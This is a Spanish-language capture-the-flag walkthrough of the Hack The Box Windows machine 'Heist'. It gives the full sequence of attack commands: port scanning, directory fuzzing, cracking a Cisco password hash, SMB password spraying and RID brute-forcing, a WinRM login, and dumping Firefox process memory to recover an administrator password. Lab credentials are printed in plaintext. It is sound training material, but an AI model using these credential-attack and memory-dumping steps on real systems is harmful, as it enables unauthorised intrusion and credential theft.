Heist
✍️ Autor: MinatoTW🔍 Dificultad: Fácil 📅 Fecha de creación: 20/11/2019
Last updated
Was this helpful?
✍️ Autor: MinatoTW🔍 Dificultad: Fácil 📅 Fecha de creación: 20/11/2019
Last updated
Was this helpful?
Was this helpful?
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 10.10.10.149para verificar la conectividad de red.
A continuación, realizamos el comando:
nmap -sC -sV 10.10.10.149para realizar un escaneo de puertos y servicios detallado en la dirección IP.
Durante el escaneo se identificaron los siguientes puertos abiertos:
Puerto 80 (HTTP): El puerto 80 está abierto y ejecutando un servidor web Microsoft IIS 10.0. Además, la página detectada es "Support Login Page" y el recurso solicitado es login.php.
Puerto 135 (MSRPC): El puerto 135 (RPC) está abierto, lo cual indica que el sistema Windows puede estar ejecutando servicios de administración remota.
Puerto 445 (SMB): El puerto 445 está abierto, lo que indica que SMB (Server Message Block) está en uso. Esto puede abrir múltiples vectores de ataque.
A continuación, se procederá a analizar cada uno de estos servicios en busca de posibles vectores de ataque.
Se utiliza el comando:
sudo nmap -sCV -p80,135,445 -v 10.10.10.149para que nos proporcione más información sobre esos puertos específicamente.
Revisamos el puerto 80.
Le damos a iniciar como invitado.
Vemos que hay dos usuarios llamados Hazard y Admin. Hazard tiene un problema con el router de CISCO. Hacemos una búsqueda de directorios.
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.10.149/FUZZMe llama la atención el directorio attachments.
Nos da error ya que no tenemos permisos por lo que enumeramos los archivos que contiene ese directorio.
gobuster dir -u http://10.10.10.149/attachments/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,pdf,jpg,png,zip,docx,csvNos llama la atención el fichero config.txt.
Vemos unas contraseñas de Cisco por lo que las crackeamos.
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtCon crackmapexec miramos las credenicales posibles con Hazard y esas contraseñas.
crackmapexec smb 10.10.10.149 -u Hazard -p contraseñas.txtEl RID Bruteforce es una técnica para enumerar usuarios de un sistema Windows explotando cómo funciona el protocolo SMB por lo que eso hacemos.
crackmapexec smb 10.10.10.149 -u Hazard -p stealth1agent --rid-bruteHan aparecido mas usuarios por lo que descubrimos si tenemos sus contraseñas.
crackmapexec smb 10.10.10.149 -u usuarios.txt -p contraseñas.txtHemos encontrado las credenciales de Chase. Nos logueamos para tener acceso a WINRM.
evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d"El primer punto menciona “Seguir revisando la lista de incidencias”. Esto se puede hacer a través de un navegador. Si recordamos, las incidencias eran la sección donde el usuario "Hazard" tenía problemas con su router Cisco y donde pudimos acceder a su archivo de configuración en los adjuntos. Esto sugiere que quien escribió esta nota monitorea activamente las incidencias en el servidor web.
Además, hemos notado que Firefox está instalado en la máquina, a pesar de no ser el navegador predeterminado.
Subimos esto.
Generar el volcado de memoria: Lo primero que hago es obtener el volcado de memoria de un proceso, como Firefox, utilizando la herramienta procdump. Para ello, ejecuto el siguiente comando en PowerShell, sustituyendo <PID> por el ID del proceso que quiero volcar.
.\procdump64.exe -ma 6624 -accepteula firefox.dmpBuscar las credenciales: Una vez que tengo el volcado de memoria, procedo a buscar la contraseña o los hashes de las credenciales dentro del archivo .dmp. En este caso, encontré la contraseña del administrador: 4dD!5}x/re8]FBuZ.
download firefox.dmp
strings firefox.dmp | grep -ie "login_username\|login_password"Conseguimos las credenciales de administrator de SMB.
smbclient //10.10.10.149/C$ -U administratorYa somos root.
